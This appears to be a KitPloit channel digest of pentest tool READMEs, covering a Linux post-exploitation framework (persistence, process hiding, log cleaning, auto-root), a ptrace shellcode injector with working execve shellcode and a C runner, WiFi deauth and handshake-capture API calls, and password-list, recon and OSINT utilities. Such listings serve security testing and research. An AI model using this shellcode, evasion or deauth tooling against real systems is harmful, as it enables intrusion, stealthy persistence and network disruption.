Channel: KitPloit - PenTest Tools!

Emp3R0R - Linux Post-Exploitation Framework Made By Linux User



linux post-exploitation framework made by linux user

Still under active development


what to expect (in future releases)
  • packer: cryptor + memfd_create
  • packer: use shm_open in older Linux kernels
  • dropper: shellcode injector - python
  • injector: inject shellcode into another process, using GDB
  • port mapping: forward from CC to agents, so you can encapsulate other tools (such as Cobalt Strike) in emp3r0r's CC tunnel
  • dropper: shellcode injector - dd
  • dropper: downloader (stage 0) shellcode
  • network scanner
  • passive scanner, for host/service discovery
  • exploit kit
  • conservative weak credentials scanner
  • auto pwn using weak credentials and RCEs

why another post-exploitation tool?

why not? i don't see many post-exploitation frameworks for linux systems, and even if there were, they are nothing like mine

as a linux user, the most critical thing for remote administration is the terminal. if you hate the garbage reverse shell experience (sometimes it ain't even a shell), take a look at emp3r0r, you will be impressed

yes, i just want to make a post-exploitation tool for linux users like me, who want a better experience in their hacking

another reason is compatibility. as emp3r0r is mostly written in Go, and fully static (so are all the plugins used by emp3r0r), it will run everywhere you want (tested on Linux 2.6 and above), regardless of the shitty environments. in some cases you won't even find bash on your target, don't worry, emp3r0r uploads its own bash and many other useful tools

why is it called emp3r0r? because there's an empire

i hope this tool helps you, and i will add features to it as i learn new things


what does it do

glance
  • beautiful terminal UI
  • perfect reverse shell (true color, key bindings, custom bashrc, custom bash binary, etc)
  • auto persistence via various methods
  • post-exploitation tools like nmap and socat are integrated with the reverse shell
  • credential harvesting
  • process injection
  • ELF patcher
  • hide processes and files via libc hijacking
  • port mapping, socks5 proxy
  • auto root
  • LPE suggest
  • system info collecting
  • file management
  • log cleaner
  • stealth connection
  • internet access checker
  • autoproxy for semi-isolated networks
  • all of these in one HTTP2 connection
  • can be encapsulated in any external proxies such as TOR, and CDNs
  • and many more...

core features

transports

emp3r0r utilizes HTTP2 (TLS enabled) for its CC communication, but you can also encapsulate it in other transports such as TOR, and CDNs. all you need to do is tell emp3r0r agent to use your proxy

also, emp3r0r has its own CA pool: agents trust only emp3r0r's own CA (which you can generate using build.py), making MITM attacks much harder

below is a screenshot of emp3r0r's CC server, which has 3 agents coming from 3 different transports



auto proxy for agents without direct internet access

emp3r0r agents check if they have internet access on start, and start a socks5 proxy if they do, then they broadcast their proxy addresses (in encrypted form) on each network they can reach

if an agent doesn't have internet, it's going to listen for such broadcasts. when it receives a working proxy, it starts a port mapping of that proxy and broadcasts it to its own networks, bringing the proxy to every agent it can ever touch, and eventually bringing all agents to our CC server.

in the following example, we have 3 agents, among which only one ([1]) has internet access, and [0] has to use the proxy passed by [2]



agent traffic

every time an agent starts, it checks a preset URL for CC status; if it learns that CC is offline, no further action is executed and it waits for CC to come online

you can set the URL to a GitHub page or another less suspicious site; your agents will poll that URL at random intervals of minutes

no CC communication will happen when the agent thinks CC is offline

if it isn't:

bare HTTP2 traffic:



when using Cloudflare CDN as CC frontend:



packer - start agent in memory

packer encrypts agent binary, and runs it from memory (using memfd_create)

currently emp3r0r is mostly memory-based, if used with this packer



dropper - pure memory based agent launching

dropper drops a shellcode or script on your target, eventually runs your agent, in a stealth way

below is a screenshot of a python based shellcode delivery to agent execution:



hide processes and files

currently emp3r0r uses libemp3r0r to hide its files and processes, which utilizes glibc hijacking


persistence

currently implemented methods:

more will be added in the future


modules

basic command shell

this is not a shell, it just executes any commands you send with sh -c and sends the result back to you

besides, it provides several useful helpers:

  • file management: put and get
  • command autocompletion
  • #net shows basic network info, such as ip a, ip r, ip neigh
  • #kill processes, and a simple #ps
  • bash !!! this is the real bash shell, keep on reading!



fully interactive and stealth bash shell

a reverse bash shell, started with custom bash binary and bashrc, leaving no trace on the system shell

emp3r0r's terminal supports everything your current terminal supports, you can use it just like an openssh session

but wait, it's more than just a reverse bash shell, with module vaccine, you can use whatever tool you like on your target system



credential harvesting

not implemented yet

i wrote about this in my blog


auto root

currently emp3r0r supports CVE-2018-14665; agents exploit this vulnerability if possible and restart themselves with root privileges



LPE suggest

upload the latest:

and run them on the target system, returning the results



port mapping

map any target addresses to CC side, using HTTP2 (or whatever transport your agent uses)



plugin system

yes, there is a plugin system. please read the wiki for more information




thanks



Longtongue - Customized Password/Passphrase List Inputting Target Info



Customized Password/Passphrase List inputting Target Info

Installation

git clone https://github.com/edoardottt/longtongue.git

cd longtongue

python3 longtongue.py


Usage
usage: longtongue.py [-h] [-p | -c | -v] [-l | -L] [-y] [-n]

Customized Password/Passphrase List inputting Target Info

optional arguments:
-h, --help show this help message and exit
-p, --person Set the target to be a person
-c, --company Set the target to be a company
-v, --version Show the version of this program
-l, --leet Add also complete 1337(leet) passwords
-L, --leetall Add also ALL possible le37(leet) passwords
-y, --years Add also years at password. See years range inside longtongue.py
-n, --numbers Add also numbers at password. See numbers range inside longtongue.py

Examples



Pidrila - Python Interactive Deepweb-oriented Rapid Intelligent Link Analyzer



PIDRILA: Python Interactive Deepweb-oriented Rapid Intelligent Link Analyzer is a really fast async web path scanner prototype developed by the BrightSearch team for all ethical netstalkers.


Installation & Usage
git clone https://github.com/enemy-submarine/pidrila.git
cd pidrila
python3 pidrila.py -u <URL>

Options
Usage: pidrila.py [OPTIONS]

Options:
-U, --user-agent TEXT                    User-Agent
-t, --timeout INTEGER                    Request timeout [default: 30]
-A, --auth TEXT                          Basic HTTP auth, i.e. login:password
-M, --max-connections-per-host INTEGER   How many simultaneous connections should we open (per each host) [default: 16]
-m, --max-connections INTEGER            How many simultaneous connections should we open [default: 128]
-p, --proxy TEXT                         Proxy address, like socks5h://127.0.0.1:9050
-p, --pathlist FILENAME                  Path list
-L, --url-list FILENAME                  Target URL list
-u, --url TEXT                           Target URL, option is mutually exclusive with url_list [required]
-l, --logs DIRECTORY                     Destination directory for the logs
--http-method [head|get]                 HTTP method: GET or HEAD [default: get]
--help                                   Show this message and exit.

Features
  • Asynchronous
  • Can simultaneously scan unlimited number of sites
  • Keep-alive support
  • HTTP and SOCKS proxy support
  • User agent randomization

Usage examples

Scan single clearweb site

 python3 ./pidrila.py -u http://silenthouse.yoba -M 128

Scan single onion site

 python3 ./pidrila.py -u http://zqktlwi4fecvo6ro.onion -m 16 -M 16 --proxy=socks5h://127.0.0.1:9050

Fast batch scan with custom User-Agent

python3 ./pidrila.py -m 2048 -L darkweb_sites_list.txt --user-agent "Pantusha/2.0 (4.2BSD)"



MUD-Visualizer - A Tool To Visualize MUD Files



This tool can be used to visualize the MUD files in JSON format.


Motivation

MUD files are plain text files in JSON format that contain ACL rules for a device. A MUD file can contain tens or hundreds of ACL rules, which makes it difficult to read and validate the files manually. mud-visualizer will help you to read and validate (and, in the near future, modify) MUD files.


Installation

Use the following commands to install and run mud-visualizer:

$ git clone https://github.com/iot-onboarding/mud-visualizer
$ cd mud-visualizer
$ npm install
$ npm start

Supported MUD Abstractions

Currently the following MUD abstractions are supported in both the incoming and outgoing traffic directions:

  • domain-names
  • local-networks
  • same-manufacturer
  • manufacturer
  • my-controller
  • controller

Contribution

Contributions are welcome! Submit your pull requests to the master branch.


Support

Feel free to reach out to us at mud@ietf.org.

Also, you are strongly encouraged to use Github's Issues to submit new issues, or request enhancements or new features.



Wprecon - A Vulnerability Recognition Tool In CMS Wordpress, 100% Developed In Go



Hello! Welcome. Wprecon (Wordpress Recon) is a vulnerability recognition tool for the CMS Wordpress, 100% developed in Go.


Notice:

Why is the project out of updates these days ?! What happens is that I am doing the vulnerability scanner.

Branch Dev

Compile and Install

Features

  • Random Agent
  • Detection WAF
  • User Enumerator
  • Plugin Scanner
  • Theme Scanner
  • Tor Proxy's
  • Detection Honeypot
  • Fuzzing Backup Files

Usage

Flag(s)                   Description
-u, --url string          Target URL (Ex: http(s)://example.com/). (Required)
--users-enumerate         Use the supplied mode to enumerate Users.
--themes-enumerate        Use the supplied mode to enumerate Themes.
--plugins-enumerate       Use the supplied mode to enumerate Plugins.
--detection-waf           I will try to detect if the target is using any WAF.
--detection-honeypot      I will try to detect if the target is a honeypot, based on the shodan.
--no-check-wp             Will skip wordpress check on target.
--random-agent            Use randomly selected HTTP(S) User-Agent header value.
--tor                     Use Tor anonymity network.
--disable-tls-checks      Disables SSL/TLS certificate verification.
-h, --help                help for wprecon.
-v, --verbose             Verbosity mode.

WPrecon running

Command: wprecon --url "https://www.xxxxxxx.com/" --detection-waf


Output:
—————————————————————————————————————————————————————————————————————

___ ______________________________________________ __
__ | / /__ __ \__ __ \__ ____/_ ____/_ __ \__ | / /
__ | /| / /__ /_/ /_ /_/ /_ __/ _ / _ / / /_ |/ /
__ |/ |/ / _ ____/_ _, _/_ /___ / /___ / /_/ /_ /| /
____/|__/ /_/ /_/ |_| /_____/ \____/ \____/ /_/ |_/

Github: https://github.com/blackcrw/wprecon
Version: 0.0.1a
————————————————————————————————————————————————————————————————————
[•] Target: https://www.xxxxxxx.com/
[•] Starting: 09/jan/2020 12:11:17

[•] Listing enable: https://www.xxxxxxx.com/wp-content/plugins/
[•] Listing enable: https://www.xxxxxxx.com/wp-content/themes/
[•••] Status Code: 200 — URL: https://www.xxxxxxx.com/wp-admin/
[•••] I'm not absolutely sure that this target is using wordpress! 37.50% chance. do you wish to continue ? [Y/n]: Y
[•••] Status Code: 200 — WAF: Wordfence Security Detected
[•••] Do you wish to contin ue ?! [Y/n] : Y


pongoOS - A Pre-Boot Execution Environment For Apple Boards



A pre-boot execution environment for Apple boards built on top of checkra1n.


Building on macOS
  • Install Xcode + command-line utilities
  • make clean all

Building on Linux
  • Download Sam Bingner's iOS Toolchain
  • Copy scripts/arm64-apple-ios12.0.0-clang to a directory in $PATH
  • Adjust the TOOLCHAIN variable to point to the downloaded toolchain
  • make clean all

Contributions

By submitting a pull request, you certify that this contribution is coming from you and no one else. If you want to import third-party code, that shall be noted prominently for us to evaluate it appropriately.


Module

You can build the module at example/ with an iOS cross-compiler on Linux or a Mac. Refer to scripts/ to see how to load modules.


Kernel patchfinder

Note that the checkra1n patchfinder is not currently open-source. However, the KPF JIT that will ship on checkra1n 0.10.0 onwards is part of this repository. That means that pongoOS builds from this repository will always boot to the shell by default instead of XNU.



Sigurls - A Reconnaissance Tool, It Fetches URLs From AlienVault's OTX, Common Crawl, URLScan, Github And The Wayback Machine



sigurls is a reconnaissance tool, it fetches URLs from AlienVault's OTX, Common Crawl, URLScan, Github and the Wayback Machine.


Usage

To display help message for sigurls use the -h flag:

$ sigurls -h

_ _
___(_) __ _ _ _ _ __| |___
/ __| |/ _` | | | | '__| / __|
\__ \ | (_| | |_| | | | \__ \
|___/_|\__, |\__,_|_| |_|___/ v1.3.1
|___/

USAGE:
sigurls [OPTIONS]

OPTIONS:
-d domain to fetch urls for
-sE comma(,) separated list of sources to exclude
-iS include subdomains' urls
-sL list all the available sources
-nC no color mode
-silent silent mode: output urls only
-sU comma(,) separated list of sources to use

Installation

From Binary

You can download the pre-built binary for your platform from this repository's releases page, extract it, then move it to your $PATH and you're ready to go.


From Source

sigurls requires go1.14+ to install successfully. Run the following command to get the repo

$ GO111MODULE=on go get -u -v github.com/drsigned/sigurls/cmd/sigurls

From Github
$ git clone https://github.com/drsigned/sigurls.git; cd sigurls/cmd/sigurls/; go build; mv sigurls /usr/local/bin/; sigurls -h

Post Installation

sigurls will work after installation. However, to configure sigurls to work with certain services - currently github - you will need to have set up API keys. The API keys are stored in the $HOME/.config/sigurls/conf.yaml file - created upon first run - which uses the YAML format. Multiple API keys can be specified for each of these services.

Example:

version: 1.3.0
sources:
  - commoncrawl
  - github
  - otx
  - urlscan
  - wayback
keys:
  github:
    - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
    - asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39


ProtOSINT - A Python Script That Helps You Investigate Protonmail Accounts And ProtonVPN IP Addresses



ProtOSINT is a Python script that helps you investigate ProtonMail accounts and ProtonVPN IP addresses.


Description

This tool can help you in your OSINT investigation of Proton services (for educational purposes only).
ProtOSINT is separated into 3 sub-modules:

  • [1] Test the validity of one protonmail account
  • [2] Try to find out whether your target has a protonmail account, by generating multiple addresses from combinations of the information fields you enter
  • [3] Find out whether your IP is currently affiliated with ProtonVPN

Prerequisite

Python 3


Usage
python3 protosint.py

Protonmail

The account name in a protonmail address is case-insensitive, and ProtonMail treats the "." "_" "-" symbols as transparent.
Additionally, anything after a "+" sign is not taken into account.
This means that all of the email addresses below are the same as mikemike@protonmail.com:

  • "mike.mike@protonmail.com"
  • "mike_mike@protonmail.com"
  • "mike-mike@protonmail.com"
  • "mike.mike+paypal@protonmail.com"

All of these emails have the same timestamp and refer to the account mikemike@protonmail.com

Furthermore, this technique does not always give you the creation time and date of the ProtonMail account itself, but rather the time and date when the email address itself was created (thanks to @sector035 for the tip: https://sector035.nl/articles/2020-50)
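As an added example (not part of ProtOSINT), the Python helper below applies the aliasing rules just described to canonicalise addresses and group the spellings that resolve to the same account, which is what you need when deduplicating a list of reported addresses. The domain part is kept as written; no list of Proton domains is assumed.

```python
"""Canonicalise ProtonMail addresses using the aliasing rules stated above.

Added example, not ProtOSINT's own code. Rules implemented: the local part is
case-insensitive, '.', '_' and '-' are ignored, and anything after '+' is dropped.
"""
from collections import defaultdict

# Characters ProtonMail treats as transparent in the local part (from the page).
TRANSPARENT = {".", "_", "-"}


def canonical_proton_address(address: str) -> str:
    """Return the canonical form of a ProtonMail address.

    Raises ValueError for strings that are not a single user@domain.
    """
    addr = address.strip().lower()
    if addr.count("@") != 1:
        raise ValueError(f"not a single user@domain address: {address!r}")
    local, domain = addr.split("@")
    # Drop any "+tag" sub-address: ProtonMail ignores it when routing mail.
    local = local.split("+", 1)[0]
    # Remove the separators ProtonMail does not distinguish.
    local = "".join(ch for ch in local if ch not in TRANSPARENT)
    if not local or not domain:
        raise ValueError(f"empty local part or domain: {address!r}")
    return f"{local}@{domain}"


def group_aliases(addresses):
    """Group addresses that resolve to the same ProtonMail account.

    Returns {canonical_address: [original spellings...]}, preserving input order.
    """
    groups = defaultdict(list)
    for a in addresses:
        groups[canonical_proton_address(a)].append(a)
    return dict(groups)


# Constructed sample input: the four aliases from the page, the canonical
# spelling itself, and one unrelated account that must stay separate.
SAMPLE = [
    "mike.mike@protonmail.com",
    "mike_mike@protonmail.com",
    "Mike-Mike@ProtonMail.com",
    "mike.mike+paypal@protonmail.com",
    "mikemike@protonmail.com",
    "m.ike@protonmail.com",
]

if __name__ == "__main__":
    for canon, spellings in group_aliases(SAMPLE).items():
        print(canon, "<-", ", ".join(spellings))
```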


Contributing

Feel free to clone this project. For major changes, please open an issue first to discuss what you would like to change.




RadareEye - A Tool Made For Specially Scanning Nearby devices [BLE, Bluetooth And Wifi] And Execute Our Given Command On Our System When The Target Device Comes In-Between Range



A tool made specially for scanning nearby devices [BLE, Bluetooth & Wifi] and executing a command of your choice on your own system when the target device comes within range.


NOTE:- The RadareEye owner will not be responsible if any user performs malicious activities using this tool. Use it for learning purposes only.

Installation of RadareEye:

git clone https://github.com/souravbaghz/RadareEye

Usage:

./radare <mac_addr> <option>

Available Options Are:
  • -blue   Bluetooth RadareEye
  • -ble    BLE RadareEye
  • -wifi   Wifi AP RadareEye

Running Bluetooth RadareEye:

sudo bash radare XX:XX:XX:XX:XX:XX -blue

Running BLE RadareEye:

sudo bash radare XX:XX:XX:XX:XX:XX -ble

The same applies to Wifi with the -wifi option. Here XX:XX:XX:XX:XX:XX means your target device's MAC address, and make sure to run it with sudo (if you aren't root). I didn't add a scanning feature to this script, but you can get the MAC address easily by executing 'hcitool scan' for Bluetooth and 'hcitool lescan' for BLE devices in a terminal.



After running RadareEye, it will ask you 'Command you want to trigger?'. You can skip it by simply leaving it blank, and RadareEye will then show you the status of your target (whether it is in range or not) without triggering any command. If you want to trigger a command when your target comes within range, enter it when asked. Examples:
  • The command below will shut down your system immediately when the target device comes in range.
[+]Command you want to trigger? :shutdown now
  • This one runs another script of yours.
[+]Command you want to trigger? :./myscript.py

Umbrella_android - Digital And Physical Security Advice App



Umbrella is an Android mobile app developed by Security First that provides human rights defenders with the information on what to do in any given security situation and the tools to do it. It allows the user to choose what they want to do, such as: protect data; securely make a call/email; securely access the internet; plan secure travel; protect their office/home; conduct counter-surveillance; or deal with kidnapping, arrest or evacuation. Once a situation is chosen, the app outlines what to do and what tools to use given your circumstances. This is followed by a simple checklist of recommended actions that can be customised, saved and shared securely. Umbrella’s Feed also provides users with an up-to-the-minute account of potential risks in their chosen location.


Example Usage

Umbrella is designed for everyone (people looking to increase their security, folks living in high-risk areas, regular travellers, business people, techies, journalists, NGO staff, aid workers, human rights defenders, social workers, environmental activists, etc).

However, when we built Umbrella we tried to keep in mind the story of Glenn Greenwald and Edward Snowden. Greenwald couldn't communicate with Snowden at the start because he found it cumbersome to set up encryption (he nearly missed one of the biggest stories of the decade because of this!). Also, when he (and Laura Poitras) travelled to Hong Kong, they didn't have much knowledge about how to meet securely with Snowden and detect surveillance. This is a common problem for journalists and activists. Umbrella is designed to solve this problem (and others) by having nearly everything they would have needed to know in one place: in their pocket.


Main Parts of Umbrella

Introduction: This is the part the user sees first. It explains briefly how the app works and the basic terms and conditions.

Menu: The bottom navigation menu is the main way for a user to navigate. It lists the feed, forms, lessons (with tool guides), checklists and account.

Feed: The feed contains security feeds from places like the UN Relief Web and the US Centers for Disease Control. You enter your location (and how often you want to be updated). Every time a new update is released (e.g. a disease outbreak in your location), the information comes up on the dashboard.

Lessons: Lessons are where users can learn about topics and things that they can do to improve their security. Some of the lessons have different levels (Beginner, Advanced, Expert) depending on your needs, ability, and risk. Each module is broken down into sections. At the end of each module is a list of other resources and further reading.

Tool Guides: These are detailed guides about how to use software and apps mentioned in the lessons.

Checklists: Checklists are quick and easy references to help users implement the advice in the lessons. You can tick them off as you complete each item. Items can be edited. You may also create custom checklists. If you start ticking a checklist, you will then see them on the Checklists page. Checklists can also be shared through other apps such as your email.

Forms: Forms allow a user to quickly fill out and share important information about issues such as their travel plan in a high-risk location or report on a digital/physical security incident.


Lessons

The general flow of lessons is presented in order to replicate the typical way that a user works. Protecting their information -> Communicating with other people -> Arranging and travelling to a location -> Doing their operations and work -> Dealing with personal issues that may arise-> Seeking support if something goes wrong.

These are the lessons currently in Umbrella.


Assess your risk
  • Security Planning

Information

These lessons mostly cover the security of information that is stored on your computers.

  • Managing information
  • Malware
  • Passwords
  • Protecting Files
  • Safely Deleting
  • Backing Up
  • Protect your workplace
  • Workplace raids

Communications

These lessons mostly cover the security of information when it is sent or received.

  • Mobile Phones
  • Making a call
  • Sending a message
  • Email
  • Censorship
  • Online Privacy
  • Phishing
  • Radios and satellite phones
  • Online abuse

Travel

These lessons cover the security of travelling in high-risk areas.

  • Preparation
  • Borders
  • Vehicles
  • Checkpoints
  • Protective Equipment

Work

These lessons include topics that may affect you in your work.

  • Meetings
  • Being followed
  • Protests
  • Dangerous Assignments
  • Public Assignments
  • Public Communications
  • Whistleblowers

Incident Response

These lessons cover how to respond to events.

  • Arrests
  • Evacuation
  • Kidnapping
  • Sexual Assault
  • Terrorism

Stress
  • Stress

Emergency Support

Explains places to get extra help if you have a problem.

  • Physical
  • Digital

Tools

These are detailed guides about how to use software and apps mentioned in the lessons. These are the tools currently covered in the tool guide.

  • Messaging
    • Mailvelope
    • ObscuraCam
    • Pidgin
    • Psiphon
    • Signal for Android
    • Signal for iOS
  • Encryption
    • Encrypt your iPhone
    • k9 & Open Keychain
    • KeePassXC
  • PGP
    • PGP for Linux
    • PGP for MacOS
    • PGP for Windows
  • Tor
    • Orbot & Orfox
    • Tor for MacOS
    • Tor for Linux
    • Tor for Windows
  • Files
    • Cobian Backup
    • Recuva
    • VeraCrypt
  • Other
    • Android
    • Facebook

Glossary

Contains explanations of the various terms used in the app.


About

Explains the licences that we use for and by Umbrella. Also says a big THANKYOU to everyone whose work we built on to make it happen.


Dashboard Feed Sources



These are the sources that we currently include for real-time updated security Feeds. For privacy reasons, users never connect directly to these services. We are always looking for more useful sources that will help users keep updated on the move.


Account

Navigate to the "Account" from the bottom menu. Here you can:

  • Modify settings (feed interval, feed location, feed sources, notifications, connections, import data, export data)
  • Enable Mask
  • Set a password
  • Log out

Requirements

You need an Android phone with a minimum version of 4.0.3 (SDK 15 - ICE_CREAM_SANDWICH_MR1)


Contributing Bug reports

Unfortunately stuff breaks sometimes. If you are in a hurry and have found a code or content problem then please email it to support@secfirst.org. If you have a little more time we generally try to manage any bugs using GitHub. Please search the existing issues for your bug and create a new one if the issue is not yet tracked.

https://github.com/securityfirst/Umbrella_android/issues

If the issue you have identified is a security risk to users, please read the documentation about our responsible disclosure policy here:

https://secfirst.org/legal

If you wish to contact us via PGP, please drop a mail to rory@secfirst.org (2C1D3B4D)

https://pgp.mit.edu/pks/lookup?op=vindex&search=0xFFB9B5BE2C1D3B4D

Contributing Ideas

Ideas are powerful things! If you have any about what we could do better or things which you think we should do in the future, please email us at info@secfirst.org.


Contributing Code

We have a really big development plan of functionality we want to include in the future and are currently in the process of building a way to manage contributions from the open source community. Until we have that up please drop us a mail at info@secfirst.org if you are interested in contributing a specific part of future code. If there is something you want to help out within the interim, then here is some basic advice:

  1. Fork it!

  2. Create your feature branch: git checkout -b my-new-feature

  3. Commit your changes: git commit -am 'Add some feature'

  4. Push to the branch: git push origin my-new-feature

  5. Submit a pull request :D

Build Instructions

Build it yourself


Contributors

Thanks to everyone who has contributed code to Umbrella. It wouldn’t have happened without you.

Cryptography Notice

This distribution includes cryptographic software. The country in which you currently reside may have restrictions on the import, possession, use, and/or re-export to another country, of encryption software. BEFORE using any encryption software, please check your country's laws, regulations and policies concerning the import, possession, or use, and re-export of encryption software, to see if this is permitted.

See http://www.wassenaar.org/ for more information.



K55 - Linux X86_64 Process Injection Utility | Manipulate Processes With Customized Payloads



(pronounced: "kay fifty-five")
The K55 payload injection tool is used for injecting x86_64 shellcode payloads into running processes. The utility was developed using modern C++11 techniques as well as some traditional C Linux functions like ptrace(). The shellcode spawned in the target process is 27 bytes and it executes /bin/sh (spawns a bash shell) within the target's address space. In the future, I will allow users to input their own shellcode via command line arguments.


Installation
  1. git clone https://github.com/josh0xA/K55.git
  2. cd K55
  3. chmod +x build-install.sh
  4. ./build-install.sh

K55 Usage

Usage: ./K55 <process-name>

  • process-name can be any linux process with r-xp or execstack permissions.

Tests

Test 1) In one terminal (K55/ Directory), run: ./k55_example_process/k55_test_process
Test 2) In another terminal, run the injector: ./K55 k55_test_process


K55 In Action
  • A shell is spawned in k55_test_process when the K55 shellcode injector is run (as root).

Injecting Into Given Process



Shell Spawned In Target



Limitations

Obviously, ptrace(PTRACE_POKETEXT...) calls are not the most disguised, so some applications can limit the effect of K55. For security testing, make sure to turn on execstack for your target applications. For example, if I'm testing on gdb, before injecting I would run the following: sudo execstack -s /usr/bin/gdb. Install execstack from your distribution's package manager. For Arch Linux users, you can find execstack on the AUR.


Crafting The Shell Payload

Note: The following is a demonstration. The payload string is already hardcoded into K55.


Assembly Implementation of The Payload (Cited from shell-storm (redirect))
main:
xor eax, eax
mov rbx, 0xFF978CD091969DD1
neg rbx
push rbx
push rsp
pop rdi
cdq
push rdx
push rdi
push rsp
pop rsi
mov al, 0x3b
syscall

C-Implementation of The Payload
#include <stdio.h>
#include <string.h>

// Shellcode breakdown of the assembly code above: 27 bytes that execve "/bin//sh".
// The string constant is carried negated (see `neg rbx`) so the byte string
// contains no 0x00 that would truncate a string copy.
char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";

int main(void)
{
    // strlen() returns size_t, so %zu is the correct conversion specifier.
    printf("len:%zu bytes\n", strlen(code));
    // Jump into the byte array. This only works when the binary's data is
    // executable (e.g. built/marked with execstack, as the Limitations section notes).
    (*(void(*)()) code)();
    return 0;
}

References

http://shell-storm.org/shellcode/files/shellcode-806.php
https://0x00sec.org/t/linux-infecting-running-processes/1097



Pineapple-MK7-REST-Client - WiFi Hacking Workflow With Pineapple Mark 7 API



PINEAPPLE MK7 REST CLIENT
  • The leading rogue access point and WiFi pentest toolkit for close access operations.
  • Passive and active attacks analyze vulnerable and misconfigured devices.
  • @HAK5

Author:: TW-D

Version:: 1.0.2

Copyright:: Copyright (c) 2021 TW-D

License:: Distributes under the same terms as Ruby

Doc:: https://docs.hak5.org/hc/en-us/articles/360049854174-WiFi-Pineapple-Mark-VII-REST-API

Requires:: ruby >= 2.7.0, rest-client 2.1.0 gem and Pineapple MK7 Firmware 1.0.1

Installation::

  • sudo apt-get install ruby ruby-dev

  • sudo gem install rest-client


Usage

See/edit/execute the files in the samples/ folder



System Authentication accessors/method
system = PineappleMK7::System.new()
system.host = (string) "172.16.42.1"
system.host()
system.port = (string) "1471"
system.port()
system.mac = (string) "00:13:37:DD:EE:FF"
system.mac()
system.password = (string) "P@55w0rD"
system.login()

The host(), port() and mac() accessors return a string.

The login() method returns a boolean.


Modules

Module Recon methods
recon = PineappleMK7::Modules::Recon
recon.startScan( (integer) time )
recon.getResults( (integer) scanID )
recon.deleteScan( (integer) scanID )

The startScan method has a scanID() submethod and returns an integer.

The getResults method has APResults(), UnassociatedClientResults() and OutOfRangeClientResults() submethods.

The APResults() submethod returns an array of objects, each of which has:

ssid()
bssid()
encryption()
hidden()
wps()
channel()
signal()
clients() -> client_mac(), ap_mac() and ap_channel()

The UnassociatedClientResults() submethod returns an array of objects, each of which has:

client_mac()
ap_mac()
ap_channel()

The OutOfRangeClientResults() submethod returns an array of objects, each of which has:

client_mac()
ap_mac()
ap_channel()

Module PineAP methods
pineAP = PineappleMK7::Modules::PineAP
pineAP.enable()
pineAP.startHandshakesCapture( (hash/object) ap )
pineAP.deauthAP( (string) bssid, (integer) channel, (array) clients )
pineAP.deauthClient( (string) bssid, (integer) channel, (string) mac )
pineAP.stopHandshakesCapture()
pineAP.getHandshakes()
pineAP.filterClient( (string "allow" or "deny") mode )
pineAP.filterSSID( (string "allow" or "deny") mode )
pineAP.addSSID( (string) ssid )
pineAP.clearPool()
pineAP.setRogue()
pineAP.getClients()
pineAP.disable()

The getHandshakes() method has a handshakes() submethod that returns an array of objects, each of which has:

type()
bssid()

The getClients() method returns an array of objects, each of which has:

mac()
ip()
hostname()
ssid()
tx_bytes()
rx_bytes()

Module Notifications method
notifications = PineappleMK7::Modules::Notifications
notifications.clearAll()

Module Download method
download = PineappleMK7::Modules::Download
download.handshake( (string) bssid, (string) type, (string) destination )


Stegbrute - Fast Steganography Bruteforce Tool Written In Rust Useful For CTF's



stegbrute is a fast steganography brute-force tool written in Rust that also uses threads to achieve faster execution.


Dependencies

Stegbrute cannot run without steghide! To install steghide, run:

apt-get install -y steghide

If you are not on a Debian-based distribution you can download it from the steghide website.


Installation

stegbrute can be installed in different ways:


Cargo

Through cargo (the Rust package manager).

If you don't have cargo you can install it either from apt or by downloading Rust.

cargo install stegbrute

this will work for every platform


Debian distributions

If you have Ubuntu/Kali or another Debian-based distribution you can install the .deb file found in the releases section, then unpack the file and run it:

wget https://github.com/R4yGM/stegbrute/releases/download/0.1.1/stegbrute_0.1.1_amd64.deb &&
dpkg --install stegbrute_0.1.1_amd64.deb

Docker

If you don't have Docker installed you can follow their guide.

First pull the Docker image (only 4.93 MB) from the Docker registry (you can see it here); if you don't want to pull the image you can also clone the repository and build the image from the Dockerfile.

docker pull r4yan/stegbrute:latest

You can also pull a different image by replacing 'latest' with a stegbrute version, e.g.

docker pull r4yan/stegbrute:0.1.0

If you don't want to pull the image you can download/copy the stegbrute Dockerfile (found here) and build the image from it.

Then, to launch the container, first create a volume to share your files with the container:

docker volume create --name stegbrute_data

Then move or copy the files you want to use with stegbrute into the volume folder, which is usually /var/lib/docker/volumes/stegbrute_data/_data, by doing:

cp wordlist.txt /var/lib/docker/volumes/stegbrute_data/_data && cp file.jpg /var/lib/docker/volumes/stegbrute_data/_data

and now run stegbrute

docker run -v stegbrute_data:/stegbrute_data -it --rm --name stegbrute r4yan/stegbrute:latest <options>

Replace <options> with the options/arguments you want to give to stegbrute. Once this is done you don't have to pull/build the image again unless there are new updates or features.

Always save your results inside the volume and not in the container, because the container is removed when it exits (--rm) and anything written there is deleted! You can save them by adding the option -x /$VOLUME_NAME/results.txt or --extract-file /$VOLUME_NAME/results.txt

If you added this and did everything correctly, at the end of every attack you will find the results inside the folder /var/lib/docker/volumes/stegbrute_data/_data

this will work for every platform


Executable

You can also download the precompiled program and then execute it, for example:

wget https://github.com/R4yGM/stegbrute/releases/download/0.1.1/stegbrute && chmod +x stegbrute
mv stegbrute /usr/local/bin/

Usage

stegbrute is very simple to use and gives you many options; you can view the program help with the -h or --help option:

============================================================
____ _ ____ _
/ ___|| |_ ___ __ _| __ ) _ __ _ _| |_ ___
\___ \| __/ _ \/ _` | _ \| '__| | | | __/ _ \
___) | || __/ (_| | |_) | | | |_| | || __/
|____/ \__\___|\__, |____/|_| \__,_|\__\___|
|___/

StegBrute v0.1.1 - By R4yan
https://github.com/R4yGM/StegBrute

StegBrute 0.1.1
R4yan <yessou.rayan@gmail.com>
Steganography bruteforce tool

USAGE:
stegbrute [FLAGS] [OPTIONS] --file-name <file-name> --wordlist <wordlist>

FLAGS:
-h, --help Prints help information
-V, --version Prints version information
-v, --verbose shows every try the program does

OPTIONS:
-x, --extract-file <extract-file> the file name path where you want to write the results [default:
stegbrute_results.txt]
-f, --file-name <file-name> the file name path you want to crack
-t, --threads <threads> number of threads to bruteforce the file [default: 3]
-w, --wordlist <wordlist> path of the wordlist


Options :

  • -x or --extract-file with <file_name> saves the extracted data into file_name; if no file is specified, stegbrute saves your results in ./stegbrute_results.txt

  • -t or --threads with <number_of_threads> launches that many threads bruteforcing the file simultaneously; increasing the number of threads doesn't always make it run faster, it all depends on how many threads your machine can handle

